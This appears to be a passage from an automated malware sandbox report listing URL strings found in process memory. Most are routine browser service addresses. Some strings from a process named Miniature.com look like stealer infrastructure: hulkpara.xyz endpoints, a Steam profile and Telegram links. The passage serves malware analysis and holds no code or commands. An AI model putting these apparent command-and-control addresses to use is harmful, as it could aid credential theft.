                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000018.00000002.1852599381.000071EC00314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000015.00000002.1724366438.0000010400668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Miniature.com, 00000010.00000002.2126388687.0000000004427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hulkpara.xyz
                Source: Miniature.com, 00000010.00000002.2126388687.0000000004438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hulkpara.xyz/
                Source: Miniature.com, 00000010.00000002.2126388687.0000000004438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hulkpara.xyz/ux
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2122589934.00000000001EC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://hulkpara.xyzh;
                Source: Miniature.com, 00000010.00000002.2122589934.000000000031C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://hulkpara.xyzrt/form-data;
                Source: chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ickegcp.0
                Source: Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000015.00000002.1741430503.000033EC00238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000015.00000002.1741430503.000033EC00238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000015.00000002.1741430503.000033EC00238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard3
                Source: chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000015.00000002.1742418542.000033EC00780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000015.00000002.1723769051.0000010400438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000015.00000003.1642310765.000033EC006F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742391246.000033EC00754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1684334192.0000010400AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
                Source: chrome.exe, 00000015.00000002.1742391246.000033EC00754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000015.00000002.1722649690.00000104000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000015.00000002.1723769051.0000010400438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000015.00000002.1722649690.00000104000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1722649690.00000104000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000015.00000002.1722649690.00000104000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723566178.0000010400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: msedge.exe, 00000018.00000002.1852599381.000071EC00314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000018.00000002.1852599381.000071EC00314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: msedge.exe, 00000018.00000002.1852599381.000071EC00314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000015.00000002.1723793429.000001040044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724970029.00000104007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000015.00000002.1723793429.000001040044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724970029.00000104007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000015.00000002.1727288704.0000010400D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000015.00000002.1726079740.00000104009D3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1652979145.0000010400FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726052953.00000104009B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 000003.log7.26.dr, 000003.log9.26.drString found in binary or memory: https://ntp.msn.com/
                Source: 000003.log7.26.drString found in binary or memory: https://ntp.msn.com/0
                Source: QuotaManager.26.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 000003.log7.26.dr, 2cc80dabc69f58b6_1.26.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 000003.log7.26.dr, 2cc80dabc69f58b6_1.26.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: QuotaManager.26.dr, QuotaManager-journal.26.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000018.00000002.1852599381.000071EC00314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000015.00000002.1722678966.00000104000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000015.00000002.1723389047.000001040031C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000015.00000002.1722678966.00000104000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.googp?
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000018.00000003.1786300199.000071EC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1786855374.000071EC0026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000015.00000002.1726079740.00000104009D3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1652979145.0000010400FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726052953.00000104009B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000015.00000003.1656463048.000001040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656283637.00000104010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000015.00000002.1726052953.00000104009B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000015.00000002.1722493733.0000010400077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000015.00000002.1722546758.000001040009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000015.00000002.1723769051.0000010400438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Miniature.com, 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Miniature.com, 00000010.00000003.1461059136.00000000043CF000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461285566.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461401955.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461010289.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Miniature.com, 00000010.00000002.2125257561.0000000001B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Miniature.com, 00000010.00000003.1461059136.00000000043CF000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461285566.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461401955.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461010289.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000003.1461497225.00000000043A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Miniature.com, 00000010.00000002.2126388687.0000000004427000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: chrome.exe, 00000015.00000002.1726339262.0000010400A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.26.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
